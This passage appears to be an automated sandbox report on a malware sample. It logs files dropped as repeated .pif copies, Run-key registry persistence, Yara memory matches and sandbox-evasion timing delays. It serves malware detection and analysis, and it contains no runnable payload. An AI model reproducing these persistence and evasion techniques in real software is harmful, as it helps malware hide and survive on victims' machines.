            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D7A12 push es; ret 0_2_064D7A20
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D79C0 push es; ret 0_2_064D7A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004017BF push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A8C2 push ss; iretd 7_2_0040A921
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041A881 push esp; iretd 7_2_0041A882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E8B7 push ss; ret 7_2_0041E8BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004051A1 push ebp; ret 7_2_004051A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004019BF push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00401B31 push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00403500 push eax; ret 7_2_00403502
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041CD8C push edx; iretd 7_2_0041CD8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407643 pushfd ; iretd 7_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407638 pushfd ; iretd 7_2_0040765A

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif
            Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe

            Boot Survival

            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.exe PID: 4416, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif PID: 6180, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif PID: 3840, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif PID: 6436, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif PID: 5480, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif PID: 3596, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif PID: 5000, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif.pif PID: 4012, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif.pif.pif PID: 5244, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02F7096E rdtsc 7_2_02F7096E
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593874
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593614
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593485
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599844
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599334
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599141
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598986
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598846
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598719
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598577
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597707
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597340
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597093
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 578422
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599759
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599643
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599520
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599153
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599046
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598718
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598499
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598254
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597920
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596991
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595796
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595687
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595359
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594806
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599754
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599516
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599381
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598995
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598652
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597575
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597462
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597322
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597071
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596647
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596498
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596373
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596136
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595674
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595542
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595413
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595252
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594965
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594641
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594510
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594385
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594277
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594027
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593909
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593209
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593078
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592859
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592587
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592476
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592374
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Window / User API: threadDelayed 1928
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Window / User API: threadDelayed 6489
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Window / User API: threadDelayed 2879
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Window / User API: threadDelayed 4426
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Window / User API: threadDelayed 3167
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Window / User API: threadDelayed 1556
            Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 5544
            Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 4428
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Window / User API: threadDelayed 471
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Window / User API: threadDelayed 3855
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Window / User API: threadDelayed 4319
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Window / User API: threadDelayed 2662
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Window / User API: threadDelayed 4681
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Window / User API: threadDelayed 1876
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Window / User API: threadDelayed 1401
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Window / User API: threadDelayed 463
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Window / User API: threadDelayed 886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Window / User API: threadDelayed 2305
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Window / User API: threadDelayed 6730
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Window / User API: threadDelayed 5773
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Window / User API: threadDelayed 481
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.8 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.2 %
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 3720Thread sleep time: -594496s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep count: 5544 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep time: -11088000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep count: 4428 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 5840Thread sleep time: -8856000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4852Thread sleep count: 471 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599156s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -599006s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598562s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598390s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597484s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -597218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596465s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -596323s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595854s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595703s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -595047s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594887s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594758s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594625s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594495s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594347s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594215s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -594070s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593936s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593457s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593296s >= -30000s
